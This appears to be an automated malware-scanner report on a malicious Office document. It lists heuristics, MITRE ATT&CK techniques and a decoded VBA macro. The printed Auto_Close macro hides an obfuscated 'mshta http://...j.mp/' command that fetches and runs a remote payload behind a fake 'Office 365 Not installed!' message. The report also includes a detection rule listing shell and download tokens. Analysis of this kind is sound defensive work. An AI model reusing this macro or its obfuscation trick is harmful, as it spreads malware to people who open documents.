MALICIOUS
128
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
The critical heuristic 'OLE_VBA_SHELL' and the high heuristic 'OLE_VBA_PCODE_AUTOEXEC_EXEC' indicate the presence of a potentially malicious Shell call within the VBA macros. The Auto_Close macro attempts to construct and execute a command string, which includes launching 'WINWORD' and concatenating a URL. This suggests the macro is designed to download and execute a second-stage payload.
Heuristics 4
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
MsgBox ("Office 365 Not installed!"): Shell ("WINWORD"): Shell (WINWORD + MsgBoxOláMundo¨¨¨¨M_S) -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECTriggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
-
Auto_Close macro low OLE_VBA_AUTOCLOSEAuto_Close macroMatched line in script
Sub Auto_Close()
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 540 bytes |
SHA-256: 6d8d75469f94b5ad050f1c137899ab6f19b63a899f2ad7487188eb10dce8afa2 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "Module1"
Sub Auto_Close()
¨¨¨¨PDf_3¨¨¨¨¨¨¨¨¨¨ = "jasdoaksdosasdkdkodk"
¨¨¨¨PDf_2¨¨¨¨¨¨¨¨¨¨ = "tp://1230912489%1230192309@j.mp/"
¨¨¨¨PDf_1¨¨ = "hta"" ht"
¨¨¨¨PDf¨¨¨¨¨¨¨¨ = """ms"
MsgBoxOláMundo¨¨¨¨M_S = ¨¨¨¨PDf¨¨¨¨¨¨¨¨ + ¨¨¨¨PDf_1¨¨ + ¨¨¨¨PDf_2¨¨¨¨¨¨¨¨¨¨ + ¨¨¨¨PDf_3¨¨¨¨¨¨¨¨¨¨
MsgBox ("Office 365 Not installed!"): Shell ("WINWORD"): Shell (WINWORD + MsgBoxOláMundo¨¨¨¨M_S)
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.